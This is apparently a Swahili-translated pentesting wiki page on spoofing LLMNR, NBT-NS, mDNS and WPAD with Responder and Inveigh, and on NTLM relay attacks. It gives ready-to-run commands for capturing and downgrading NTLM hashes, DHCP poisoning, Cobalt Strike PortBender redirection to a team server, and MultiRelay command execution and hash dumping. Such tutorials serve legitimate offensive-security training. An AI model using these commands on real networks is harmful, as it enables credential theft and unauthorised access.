Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Reading time: 6 minutes

Network Protocols

Local Host Resolution Protocols

• LLMNR, NBT-NS, and mDNS:
• Microsoft na mifumo mingine ya uendeshaji hutumia LLMNR na NBT-NS kwa ajili ya kutatua majina ya ndani wakati DNS inashindwa. Vivyo hivyo, mifumo ya Apple na Linux hutumia mDNS.
• Protokali hizi zinaweza kukabiliwa na udukuzi na spoofing kutokana na asili yao isiyo na uthibitisho, ya matangazo kupitia UDP.
• Responder inaweza kutumika kuiga huduma kwa kutuma majibu yaliyotengenezwa kwa wenyeji wanaouliza protokali hizi.
• Taarifa zaidi kuhusu kuiga huduma kwa kutumia Responder inaweza kupatikana hapa.

Web Proxy Auto-Discovery Protocol (WPAD)

• WPAD inaruhusu vivinjari kugundua mipangilio ya proxy kiotomatiki.
• Ugunduzi unarahisishwa kupitia DHCP, DNS, au kurudi kwa LLMNR na NBT-NS ikiwa DNS inashindwa.
• Responder inaweza kuendesha mashambulizi ya WPAD, ikielekeza wateja kwa seva za WPAD zenye uharibifu.

Responder for Protocol Poisoning

• Responder ni chombo kinachotumika kwa kuharibu LLMNR, NBT-NS, na mDNS maswali, kikijibu kwa kuchagua kulingana na aina za maswali, hasa lengo likiwa huduma za SMB.
• Inakuja ikiwa imewekwa awali katika Kali Linux, inayoweza kubadilishwa katika /etc/responder/Responder.conf.
• Responder inaonyesha hash zilizokamatwa kwenye skrini na kuzihifadhi katika saraka ya /usr/share/responder/logs.
• Inasaidia IPv4 na IPv6.
• Toleo la Windows la Responder linapatikana hapa.

Running Responder

• Kuendesha Responder kwa mipangilio ya default: responder -I <Interface>
• Kwa uchunguzi mkali zaidi (ikiwa na athari zinazoweza kutokea): responder -I <Interface> -P -r -v
• Mbinu za kukamata changamoto/jibu za NTLMv1 kwa urahisi wa kuvunja: responder -I <Interface> --lm --disable-ess
• Kuiga WPAD kunaweza kuanzishwa kwa: responder -I <Interface> --wpad
• Maombi ya NetBIOS yanaweza kutatuliwa kwa IP ya mshambuliaji, na proxy ya uthibitishaji inaweza kuanzishwa: responder.py -I <interface> -Pv

DHCP Poisoning with Responder

• Kuiga majibu ya DHCP kunaweza kuharibu kwa kudumu taarifa za routing za mwathirika, ikitoa njia ya siri zaidi kuliko kuharibu ARP.
• Inahitaji maarifa sahihi ya usanidi wa mtandao wa lengo.
• Kuendesha shambulizi: ./Responder.py -I eth0 -Pdv
• Njia hii inaweza kukamata hash za NTLMv1/2 kwa ufanisi, lakini inahitaji kushughulikia kwa makini ili kuepuka kuingilia mtandao.

Capturing Credentials with Responder

• Responder itaimarisha huduma kwa kutumia protokali zilizoelezwa hapo juu, ikikamata akidi (kawaida NTLMv2 Changamoto/Jibu) wakati mtumiaji anajaribu kuthibitisha dhidi ya huduma zilizoghushiwa.
• Jaribio linaweza kufanywa kushuka hadi NetNTLMv1 au kuzima ESS kwa urahisi wa kuvunja akidi.

Ni muhimu kutambua kwamba kutumia mbinu hizi inapaswa kufanywa kisheria na kwa maadili, kuhakikisha idhini sahihi na kuepuka kuingilia au ufikiaji usioidhinishwa.

Inveigh

Inveigh ni chombo kwa ajili ya wapimaji wa penetralia na timu nyekundu, kilichoundwa kwa mifumo ya Windows. Kinatoa kazi zinazofanana na Responder, kikifanya spoofing na mashambulizi ya mtu katikati. Chombo hiki kimebadilika kutoka kwa skripti ya PowerShell hadi binary ya C#, na Inveigh na InveighZero kama toleo kuu. Vigezo na maelekezo ya kina yanaweza kupatikana katika wiki.

Inveigh inaweza kuendeshwa kupitia PowerShell:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Au kutekelezwa kama binary ya C#:

Inveigh.exe

NTLM Relay Attack

Shambulio hili linatumia vikao vya uthibitishaji vya SMB kupata mashine lengwa, ikitoa shell ya mfumo ikiwa ni mafanikio. Masharti muhimu ni:

• Mtumiaji anayethibitisha lazima awe na ufikiaji wa Local Admin kwenye mwenyeji aliyehamasishwa.
• SMB signing inapaswa kuzuiwa.

445 Port Forwarding and Tunneling

Katika hali ambapo utangulizi wa moja kwa moja wa mtandao hauwezekani, trafiki kwenye bandari 445 inahitaji kuhamasishwa na kutunzwa. Zana kama PortBender husaidia katika kuelekeza trafiki ya bandari 445 kwenye bandari nyingine, ambayo ni muhimu wakati ufikiaji wa admin wa ndani unapatikana kwa ajili ya kupakia madereva.

PortBender setup and operation in Cobalt Strike:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

Zana Nyingine za Shambulio la NTLM Relay

• Metasploit: Imewekwa na proxies, maelezo ya mwenyeji wa ndani na wa mbali.
• smbrelayx: Skripti ya Python kwa ajili ya kuhamasisha vikao vya SMB na kutekeleza amri au kuweka backdoors.
• MultiRelay: Zana kutoka kwenye suite ya Responder kuhamasisha watumiaji maalum au watumiaji wote, kutekeleza amri, au kutoa hashes.

Kila zana inaweza kuwekewa mipangilio ili kufanya kazi kupitia SOCKS proxy ikiwa ni lazima, ikiruhusu mashambulizi hata na ufikiaji wa mtandao wa moja kwa moja.

Uendeshaji wa MultiRelay

MultiRelay inatekelezwa kutoka kwenye /usr/share/responder/tools directory, ikilenga IP au watumiaji maalum.

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

Hizi zana na mbinu zinaunda seti kamili ya kufanya mashambulizi ya NTLM Relay katika mazingira mbalimbali ya mtandao.

Kulazimisha NTLM Logins

Katika Windows unaweza kuwa na uwezo wa kulazimisha akaunti fulani zenye mamlaka kuthibitisha kwenye mashine zisizo za kawaida. Soma ukurasa ufuatao kujifunza jinsi:

{{#ref}} ../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md {{#endref}}

Marejeleo

• https://intrinium.com/smb-relay-attack-tutorial/
• https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
• https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
• https://intrinium.com/smb-relay-attack-tutorial/
• https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html